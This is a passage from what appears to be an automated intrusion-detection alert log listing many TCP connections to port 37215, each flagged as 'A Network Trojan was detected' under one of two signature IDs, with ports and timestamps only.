                  Source Port:50788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.674320
                  SID:2835222
                  Source Port:40030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.855642
                  SID:2835222
                  Source Port:40338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.888378
                  SID:2835222
                  Source Port:33278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.880093
                  SID:2829579
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999719
                  SID:2829579
                  Source Port:60414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.781564
                  SID:2829579
                  Source Port:55634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.903981
                  SID:2835222
                  Source Port:47390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.881648
                  SID:2829579
                  Source Port:53052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179313
                  SID:2829579
                  Source Port:45490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.973446
                  SID:2829579
                  Source Port:58548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830488
                  SID:2829579
                  Source Port:59910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.100122
                  SID:2829579
                  Source Port:54578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.371632
                  SID:2829579
                  Source Port:36986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.554316
                  SID:2835222
                  Source Port:40154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.581201
                  SID:2829579
                  Source Port:39934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.301300
                  SID:2835222
                  Source Port:51030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182114
                  SID:2835222
                  Source Port:35154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.745015
                  SID:2829579
                  Source Port:42010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.141035
                  SID:2835222
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.811368
                  SID:2829579
                  Source Port:47274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2829579
                  Source Port:46108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.436089
                  SID:2835222
                  Source Port:48754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002361
                  SID:2835222
                  Source Port:55136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.818731
                  SID:2835222
                  Source Port:39636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.992041
                  SID:2835222
                  Source Port:35124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.532639
                  SID:2829579
                  Source Port:57594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.566038
                  SID:2829579
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.003355
                  SID:2829579
                  Source Port:50302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861363
                  SID:2835222
                  Source Port:54242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.365312
                  SID:2835222
                  Source Port:34220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.664170
                  SID:2829579
                  Source Port:41830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462575
                  SID:2829579
                  Source Port:45556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.833874
                  SID:2829579
                  Source Port:45260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324318
                  SID:2835222
                  Source Port:45296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.265553
                  SID:2835222
                  Source Port:48644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525598
                  SID:2829579
                  Source Port:42464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585190
                  SID:2829579
                  Source Port:50068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.721021
                  SID:2829579
                  Source Port:54436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2829579
                  Source Port:57854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614287
                  SID:2829579
                  Source Port:59136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065444
                  SID:2829579
                  Source Port:40700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.864839
                  SID:2835222
                  Source Port:60614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.170023
                  SID:2829579
                  Source Port:34782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242902
                  SID:2835222
                  Source Port:39658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.464786
                  SID:2835222
                  Source Port:49974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.407237
                  SID:2835222
                  Source Port:48576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433898
                  SID:2835222
                  Source Port:53182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.882807
                  SID:2829579
                  Source Port:45408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.009015
                  SID:2829579
                  Source Port:46284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127373
                  SID:2829579
                  Source Port:48860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887676
                  SID:2835222
                  Source Port:42130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.758689
                  SID:2829579
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2829579
                  Source Port:57970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.154911
                  SID:2835222
                  Source Port:32960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752135
                  SID:2829579
                  Source Port:39514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.128413
                  SID:2829579
                  Source Port:37682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.266829
                  SID:2829579
                  Source Port:54692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.563022
                  SID:2835222
                  Source Port:60628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655197
                  SID:2829579
                  Source Port:58632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994856
                  SID:2829579
                  Source Port:45142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.082361
                  SID:2835222
                  Source Port:57388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.136540
                  SID:2835222
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.884965
                  SID:2829579
                  Source Port:40566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.177651
                  SID:2835222
                  Source Port:55706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.549983
                  SID:2835222
                  Source Port:38148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596367
                  SID:2835222
                  Source Port:49714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561451
                  SID:2835222
                  Source Port:59580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.008672
                  SID:2835222
                  Source Port:56114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.272615
                  SID:2835222
                  Source Port:39788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.844780
                  SID:2829579
                  Source Port:47750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777569
                  SID:2829579
                  Source Port:36978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242772
                  SID:2829579
                  Source Port:33528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474716
                  SID:2829579
                  Source Port:60434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.361617
                  SID:2835222
                  Source Port:52868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.863402
                  SID:2829579
                  Source Port:36214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621432
                  SID:2835222
                  Source Port:39546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.112460
                  SID:2829579
                  Source Port:56982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.463708
                  SID:2829579
                  Source Port:41574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857576
                  SID:2835222
                  Source Port:35730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.609336
                  SID:2829579
                  Source Port:57816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2835222
                  Source Port:47084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.568062
                  SID:2829579
                  Source Port:58312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.489238
                  SID:2829579
                  Source Port:46164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.252438
                  SID:2829579
                  Source Port:46212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.059656
                  SID:2829579
                  Source Port:53164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.566830
                  SID:2829579
                  Source Port:41948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2829579
                  Source Port:38614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.947643
                  SID:2829579
                  Source Port:48016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.148686
                  SID:2829579
                  Source Port:33626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.201607
                  SID:2829579
                  Source Port:50458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.380446
                  SID:2829579
                  Source Port:59968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.827711
                  SID:2835222
                  Source Port:45360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.616284
                  SID:2835222
                  Source Port:49136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.454576
                  SID:2829579
                  Source Port:33810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505039
                  SID:2829579
                  Source Port:57762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809030
                  SID:2829579
                  Source Port:49792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857366
                  SID:2829579
                  Source Port:47376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.635714
                  SID:2835222
                  Source Port:53266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872058
                  SID:2829579
                  Source Port:57588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.089146
                  SID:2829579
                  Source Port:59576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.641864
                  SID:2835222
                  Source Port:47724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.105929
                  SID:2835222
                  Source Port:46698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.267157
                  SID:2835222
                  Source Port:34904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.557842
                  SID:2835222
                  Source Port:52378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.116364
                  SID:2835222
                  Source Port:53278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.746894
                  SID:2829579
                  Source Port:57400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095696
                  SID:2829579
                  Source Port:50012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389862
                  SID:2835222
                  Source Port:35426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.151143
                  SID:2835222
                  Source Port:42692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.279611
                  SID:2829579
                  Source Port:40430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.874672
                  SID:2835222
                  Source Port:51318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.394588
                  SID:2829579
                  Source Port:52654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177795
                  SID:2835222
                  Source Port:50326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.811202
                  SID:2835222
                  Source Port:50566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637294
                  SID:2835222
                  Source Port:58286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.415895
                  SID:2835222
                  Source Port:33764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.874415
                  SID:2835222
                  Source Port:45470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.898018
                  SID:2835222
                  Source Port:55644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.516253
                  SID:2829579
                  Source Port:35390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2829579
                  Source Port:43466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098304
                  SID:2835222
                  Source Port:57730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218998
                  SID:2829579
                  Source Port:43560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.619076
                  SID:2829579
                  Source Port:36312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.749504
                  SID:2835222
                  Source Port:50772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.775624
                  SID:2835222
                  Source Port:44364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.362536
                  SID:2835222
                  Source Port:59738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.423540
                  SID:2835222
                  Source Port:58172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088897
                  SID:2835222
                  Source Port:38428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2835222
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.992846
                  SID:2829579
                  Source Port:53460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230730
                  SID:2835222
                  Source Port:56988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.365607
                  SID:2835222
                  Source Port:58642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.615907
                  SID:2835222
                  Source Port:52424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.845496
                  SID:2829579
                  Source Port:47750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.423552
                  SID:2829579
                  Source Port:50312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.526839
                  SID:2829579
                  Source Port:53196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.986495
                  SID:2835222
                  Source Port:53600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.493980
                  SID:2835222
                  Source Port:41288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.400738
                  SID:2829579
                  Source Port:49546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.837566
                  SID:2829579
                  Source Port:44496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.226106
                  SID:2829579
                  Source Port:54950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.517538
                  SID:2835222
                  Source Port:53806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.605752
                  SID:2835222
                  Source Port:36672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.613798
                  SID:2829579
                  Source Port:50350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217527
                  SID:2835222
                  Source Port:34944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.225930
                  SID:2835222
                  Source Port:35778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.510241
                  SID:2835222
                  Source Port:38046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597424
                  SID:2829579
                  Source Port:47178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.483820
                  SID:2835222
                  Source Port:35784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.294372
                  SID:2829579
                  Source Port:35982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.368939
                  SID:2829579
                  Source Port:59478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.376718
                  SID:2829579
                  Source Port:43250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137909
                  SID:2829579
                  Source Port:41560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.290002
                  SID:2835222
                  Source Port:56612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.841554
                  SID:2829579
                  Source Port:44330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.766874
                  SID:2835222
                  Source Port:58836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854360
                  SID:2835222
                  Source Port:41170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.633994
                  SID:2835222
                  Source Port:45888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.234901
                  SID:2829579
                  Source Port:32986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2835222
                  Source Port:60744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.583365
                  SID:2835222
                  Source Port:48034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.822336
                  SID:2829579
                  Source Port:60024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.406930
                  SID:2835222
                  Source Port:37824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.114349
                  SID:2829579
                  Source Port:46184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.576586
                  SID:2829579
                  Source Port:54420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.664170
                  SID:2835222
                  Source Port:59050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.391627
                  SID:2829579
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915892
                  SID:2829579
                  Source Port:34648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.670311
                  SID:2835222
                  Source Port:47130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128612
                  SID:2835222
                  Source Port:46370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.709807
                  SID:2835222
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2835222
                  Source Port:47118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999719
                  SID:2835222
                  Source Port:51522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.338726
                  SID:2835222
                  Source Port:36766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.924578
                  SID:2835222
                  Source Port:35972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.049112
                  SID:2835222
                  Source Port:60680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.028864
                  SID:2829579
                  Source Port:45958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.837904
                  SID:2835222
                  Source Port:39748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.207242
                  SID:2829579
                  Source Port:60736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876931
                  SID:2835222
                  Source Port:55862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479051
                  SID:2829579
                  Source Port:41964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.143490
                  SID:2835222
                  Source Port:37144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.212749
